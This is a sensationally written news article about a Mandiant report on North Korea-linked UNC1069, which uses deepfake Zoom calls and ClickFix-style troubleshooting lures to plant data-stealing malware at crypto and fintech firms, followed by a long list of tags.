North Korea Linked Hackers Deploy New Crypto Malware

North Korea Linked Hackers Deploy New Crypto Malware

North Korean Hackers Unleash AI-Powered Crypto Heist: New Malware Strikes Fintech Firms

In a chilling escalation of cyber warfare, North Korean-linked threat actors have launched a sophisticated new wave of attacks targeting cryptocurrency and fintech companies, leveraging artificial intelligence to supercharge their social engineering campaigns and deploying a suite of advanced malware designed to exfiltrate sensitive data and drain digital wallets.

According to a Tuesday report by Mandiant, the cybersecurity arm of Google Cloud, a threat cluster tracked as UNC1069 has orchestrated a brazen campaign that combines cutting-edge AI deepfakes with seven unique malware families, marking a dangerous evolution in state-sponsored cybercrime.

The Anatomy of a High-Tech Heist

The attack begins with a meticulously crafted social engineering ploy. Threat actors compromise high-profile Telegram accounts—sometimes belonging to crypto founders themselves—and use them to lure victims into fake Zoom meetings. But here’s where it gets truly insidious: the attackers employ AI-generated deepfake videos to impersonate legitimate participants, complete with fabricated video feeds and claims of technical difficulties.

As Mandiant’s report details, victims are manipulated into running seemingly innocuous troubleshooting commands to “fix” audio issues during the meeting. Hidden within these commands is a malicious payload that triggers an infection chain, giving attackers a foothold in the victim’s system.

“This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH, and CHROMEPUSH,” the report states.

Meet the New Malware Arsenal

Two of the newly discovered malware families—CHROMEPUSH and DEEPBREATH—are particularly alarming. These sophisticated data-mining viruses are engineered to bypass core operating system defenses, granting attackers deep access to personal data, credentials, and cryptocurrency wallets.

Mandiant notes that UNC1069 has been active since at least 2018, but the integration of AI tools has dramatically expanded their operational capacity. For the first time in November 2025, the group incorporated AI-enabled lures into active operations, signaling a new era of automated, large-scale social engineering.

Who’s in the Crosshairs?

The campaign primarily targets cryptocurrency firms, software developers, and venture capital companies—sectors rich in digital assets and intellectual property. A victimology map released by Mandiant shows a concentrated focus on Western-based crypto startups and blockchain infrastructure providers.

This isn’t an isolated incident. North Korean cyber operatives have long been a scourge on the crypto industry, with the Lazarus Group alone responsible for some of the largest heists in history, including the $1.4 billion Bybit hack earlier this year.

In June 2025, four North Korean operatives infiltrated multiple crypto firms posing as freelance developers, collectively stealing $900,000 from unsuspecting startups. The pattern is clear: these attackers are patient, persistent, and increasingly sophisticated.

The ClickFix Scam: Old Trick, New Tech

One of the attack vectors highlighted by Mandiant is a variant of the ClickFix scam, where victims are tricked into executing commands that appear to solve a technical problem but instead install malware. In this case, the scam is elevated by AI deepfakes, making the deception far more convincing.

The attacker, posing as a Zoom participant with audio issues, convinces the victim to run a command that silently executes the malware. From there, the infection chain unfolds, with tools like SILENCELIFT and CHROMEPUSH quietly siphoning data in the background.

A Growing Threat Landscape

The use of AI in cybercrime is no longer theoretical—it’s here, and it’s escalating. Mandiant’s findings underscore a troubling trend: state-sponsored actors are harnessing the power of generative AI to scale their operations, craft more convincing lures, and evade detection.

“The integration of AI tools has allowed UNC1069 to operate at a scale and sophistication previously unseen,” the report warns. “This is not just a technological arms race—it’s a battle for the future of digital finance.”

What This Means for the Crypto Industry

For cryptocurrency companies, the stakes couldn’t be higher. The combination of social engineering, AI deepfakes, and advanced malware creates a perfect storm of risk. Traditional security measures—like two-factor authentication and endpoint protection—are no longer sufficient against these multi-layered attacks.

Industry leaders are calling for a paradigm shift in cybersecurity strategy. This includes:

  • Enhanced employee training to recognize AI-generated deepfakes and social engineering tactics.
  • Zero-trust architectures that limit lateral movement within networks.
  • AI-driven threat detection to identify anomalies in real time.
  • Collaboration between crypto firms, cybersecurity vendors, and law enforcement to share threat intelligence.

The Global Implications

The rise of AI-powered cybercrime by state-sponsored actors like UNC1069 has geopolitical ramifications. North Korea has long used cybercrime to circumvent international sanctions and fund its regime. With AI, these operations can be conducted faster, cheaper, and at a larger scale.

“This is not just about stealing crypto—it’s about undermining the integrity of the entire digital economy,” said a cybersecurity analyst familiar with the Mandiant report. “If we don’t adapt, we risk losing the trust that underpins blockchain and decentralized finance.”

What’s Next?

Mandiant’s report is a wake-up call for the crypto industry and beyond. As AI tools become more accessible, the barrier to entry for sophisticated cyberattacks will continue to fall. The question is no longer if these attacks will happen, but how prepared we are to defend against them.

For now, UNC1069 remains active, and their tactics are evolving. The only certainty is that the battle between cybercriminals and defenders will only intensify—and the stakes have never been higher.

Tags & Viral Phrases:

  • North Korean hackers
  • AI deepfake crypto scam
  • UNC1069 malware attack
  • Crypto firms under siege
  • ClickFix scam 2.0
  • SILENCELIFT malware
  • DEEPBREATH virus
  • CHROMEPUSH data miner
  • Lazarus Group returns
  • $1.4 billion Bybit hack
  • State-sponsored cybercrime
  • AI-powered social engineering
  • Fintech firms targeted
  • Crypto founder accounts stolen
  • Fake Zoom meetings
  • AI-enabled lures
  • Mandiant Google Cloud report
  • North Korea crypto theft
  • Blockchain security threat
  • Digital asset heist
  • Cyber warfare escalation
  • AI in cybercrime
  • Zero-trust for crypto
  • Defend against deepfakes
  • Crypto industry under attack
  • Advanced persistent threat
  • AI-generated phishing
  • Malware infection chain
  • Cryptocurrency security 2025
  • Blockchain vulnerability
  • North Korea sanctions evasion
  • Digital finance integrity
  • AI threat detection
  • Crypto startup security
  • Social engineering 2.0
  • Deepfake Zoom scam
  • Crypto wallet drain
  • Advanced malware families
  • AI tools in hacking
  • Cryptocurrency heist warning
  • Defend against UNC1069
  • Crypto founder impersonation
  • AI-driven cyberattacks
  • Blockchain security crisis
  • Cryptocurrency phishing scam
  • North Korea cyber ops
  • AI cybercrime evolution
  • Crypto industry wake-up call
  • Defend against AI threats

,

/0 Comments/by
0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *